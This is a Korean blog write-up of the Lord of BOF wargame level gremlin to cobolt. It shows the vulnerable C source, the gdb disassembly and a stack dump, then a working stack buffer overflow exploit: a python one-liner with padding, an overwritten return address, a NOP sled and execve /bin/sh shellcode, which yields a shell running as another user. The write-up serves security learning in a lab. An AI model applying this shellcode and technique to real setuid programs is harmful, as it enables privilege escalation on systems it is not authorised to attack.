2. gremlin → cobolt

wargame 🏴‍☠️ write-up/Lord of BOF

2. gremlin → cobolt

Kortsec1 2018. 7. 23. 11:04

id : gremlin

pw : hello bof world

먼저 소스코드를 보겠습니다.

[gremlin@localhost gremlin]$ cat cobolt.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - cobolt
        - small buffer
*/

int main(int argc, char *argv[])
{
    char buffer[16];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

gate와 달라진 점은 buffer의 크기가 256에서 16으로 엄청 작아졌다는 점 입니다.

bufffer로 직접 이동하여 실행시키기는 힘들겠네요.

그렇다면 argv[1]로 직접 이동하는 방법을 써봐야 겠네요.

[gremlin@localhost gremlin]$ gdb -q cobolt
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>:	push   %ebp
0x8048431 <main+1>:	mov    %ebp,%esp
0x8048433 <main+3>:	sub    %esp,16
0x8048436 <main+6>:	cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:	jg     0x8048453 <main+35>
0x804843c <main+12>:	push   0x80484d0
0x8048441 <main+17>:	call   0x8048350 <printf>
0x8048446 <main+22>:	add    %esp,4
0x8048449 <main+25>:	push   0
0x804844b <main+27>:	call   0x8048360 <exit>
0x8048450 <main+32>:	add    %esp,4
0x8048453 <main+35>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:	add    %eax,4
0x8048459 <main+41>:	mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:	push   %edx
0x804845c <main+44>:	lea    %eax,[%ebp-16]
0x804845f <main+47>:	push   %eax
0x8048460 <main+48>:	call   0x8048370 <strcpy>
0x8048465 <main+53>:	add    %esp,8
0x8048468 <main+56>:	lea    %eax,[%ebp-16]
0x804846b <main+59>:	push   %eax
0x804846c <main+60>:	push   0x80484dc
0x8048471 <main+65>:	call   0x8048350 <printf>
0x8048476 <main+70>:	add    %esp,8
0x8048479 <main+73>:	leave  
0x804847a <main+74>:	ret    
0x804847b <main+75>:	nop    
0x804847c <main+76>:	nop    
0x804847d <main+77>:	nop    
0x804847e <main+78>:	nop    
0x804847f <main+79>:	nop    
End of assembler dump.

별다른 dummy값 없이 16byte를 할당하네요.

그렇다면 공격 코드는 다음과 같이 구성되어야 합니다.

공격 코드
buffer(16byte)	sfp(4byte)	ret(4byte)	nop + shellcode(buffer에 들어가지 않습니다)
A X 20(20byte)		argv[1]의 주소

gate와 마찬가지로 test파일을 만들어, argv[1]의 값이 어디에 위치해 있는지 위치 값을 알아봅시다.

0x8048430 <main>:	push   %ebp
0x8048431 <main+1>:	mov    %ebp,%esp
0x8048433 <main+3>:	sub    %esp,16
0x8048436 <main+6>:	cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:	jg     0x8048453 <main+35>
0x804843c <main+12>:	push   0x80484d0
0x8048441 <main+17>:	call   0x8048350 <printf>
0x8048446 <main+22>:	add    %esp,4
0x8048449 <main+25>:	push   0
0x804844b <main+27>:	call   0x8048360 <exit>
0x8048450 <main+32>:	add    %esp,4
0x8048453 <main+35>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:	add    %eax,4
0x8048459 <main+41>:	mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:	push   %edx
0x804845c <main+44>:	lea    %eax,[%ebp-16]
0x804845f <main+47>:	push   %eax
0x8048460 <main+48>:	call   0x8048370 <strcpy>
0x8048465 <main+53>:	add    %esp,8
0x8048468 <main+56>:	lea    %eax,[%ebp-16]
0x804846b <main+59>:	push   %eax
0x804846c <main+60>:	push   0x80484dc
0x8048471 <main+65>:	call   0x8048350 <printf>
0x8048476 <main+70>:	add    %esp,8
0x8048479 <main+73>:	leave  
0x804847a <main+74>:	ret    
0x804847b <main+75>:	nop    
0x804847c <main+76>:	nop    
0x804847d <main+77>:	nop    
0x804847e <main+78>:	nop    
0x804847f <main+79>:	nop

코드를 통해 위치를 예측해 볼 수도 있습니다.

%ebp+8은 1과 비교하는 것으로 보아 argc입니다.

argv는 더 복잡해 보입니다. (%ebp+12주소에 있는 값+4)주소에 있는 값 으로 이해하면 쉽겠네요.

main+1에 breakpoint를 걸고 메모리를 분석해 봅시다.

(gdb) r `python -c 'print "A"*20 + "BBBB" + "\x90"*100 + "\x31\xc0\x50\x68\x2f
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` Starting program: /home/gremlin/test `python -c 'print "A"*20 + "BBBB" + "\x90"*
100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` Breakpoint 1, 0x8048431 in main () (gdb) x/150x $esp 0xbffffa68: 0xbffffa88 0x400309cb 0x00000002 0xbffffab4 0xbffffa78: 0xbffffac0 0x40013868 0x00000002 0x08048380 0xbffffa88: 0x00000000 0x080483a1 0x08048430 0x00000002 0xbffffa98: 0xbffffab4 0x080482e0 0x080484ac 0x4000ae60 0xbffffaa8: 0xbffffaac 0x40013e90 0x00000002 0xbffffbb2 0xbffffab8: 0xbffffbc5 0x00000000 0xbffffc5a 0xbffffc7c 0xbffffac8: 0xbffffc86 0xbffffc94 0xbffffcb3 0xbffffcc3 0xbffffad8: 0xbffffcdb 0xbffffcf8 0xbffffd17 0xbffffd22 0xbffffae8: 0xbffffd30 0xbffffd73 0xbffffd86 0xbffffd9b 0xbffffaf8: 0xbffffdab 0xbffffdb8 0xbffffdd7 0xbffffdf0 0xbffffb08: 0xbffffdfb 0xbffffe0c 0xbffffe1e 0xbffffe26 0xbffffb18: 0x00000000 0x00000003 0x08048034 0x00000004 0xbffffb28: 0x00000020 0x00000005 0x00000006 0x00000006 0xbffffb38: 0x00001000 0x00000007 0x40000000 0x00000008 0xbffffb48: 0x00000000 0x00000009 0x08048380 0x0000000b 0xbffffb58: 0x000001f5 0x0000000c 0x000001f5 0x0000000d 0xbffffb68: 0x000001f5 0x0000000e 0x000001f5 0x00000010 0xbffffb78: 0x0f8bfbff 0x0000000f 0xbffffbad 0x00000000 0xbffffb88: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffba8: 0x00000000 0x38366900 0x682f0036 0x2f656d6f 0xbffffbb8: 0x6d657267 0x2f6e696c 0x74736574 0x41414100 0xbffffbc8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffbd8: 0xbfbfbf41 0x909090bf 0x90909090 0x90909090 0xbffffbe8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffc18: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffc38: 0x90909090 0x90909090 0x50c03190 0x732f2f68 0xbffffc48: 0x622f6868 0xe3896e69 0xe1895350 0xcd0bb099 0xbffffc58: 0x454c0080 0x504f5353 0x7c3d4e45 0x7273752f 0xbffffc68: 0x6e69622f 0x73656c2f 0x70697073 0x68732e65 0xbffffc78: 0x00732520 0x52455355 0x454d414e 0x4948003d 0xbffffc88: 0x49535453 0x313d455a 0x00303030 0x54534f48 0xbffffc98: 0x454d414e 0x636f6c3d 0x6f686c61 0x6c2e7473 0xbffffca8: 0x6c61636f 0x616d6f64 0x4c006e69 0x414e474f 0xbffffcb8: 0x673d454d 0x6c6d6572

주황색부분이 프로그램 실행시 ebp가 되는 부분입니다.

그렇다면, ebp+8(argc)는 보라색 부분이 되겠죠.

((ebp+12)+4)(argv)는 초록색부분이 됩니다.

이제 argv에 있는 \x90중 한 군데를 ret에 덮어주면 되겠네요. ex) 0xbffffc18

표를 생각하면 서 python 공격 코드를 짜봅시다.

`python -c 'print "A"*20 + "\x18\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A"*20 + "\x18\xfc\xff\xbf" + 
"\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAA󐐐1󿿐h//shh/bin⏓ᙰ
                                   ̀ 
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
bash$

쉘이 잘 실행되는 것 보이시죠?

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

4. goblin → orc (0)	2018.07.26
3. cobolt → goblin (0)	2018.07.25
1. gate → gremlin (0)	2018.07.23
LoB 원정대 start (0)	2018.07.23

현재글2. gremlin → cobolt

관계자외 출입 금지

보안 서적, Vulnerability, Get-CimInstance, CIMOM, Windows Management Instrumentation, 2023 Top 10, CVE-2024-23897, expandAtFiles, PortSwigger, Win32_OperatingSystem, Format-List, Win32_UserAccount, PowerShell, 취약점, web, Format-Wide, jenkins, Format-Table, James Kettle, 사이버전의 모든 것,

Today :
Yesterday :

보안

2. gremlin → cobolt

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

티스토리툴바

« 2024/07 »
일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

2. gremlin → cobolt

'wargame 🏴‍☠️ write-up > Lord of BOF' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of BOF'의 다른글

관련글

티스토리툴바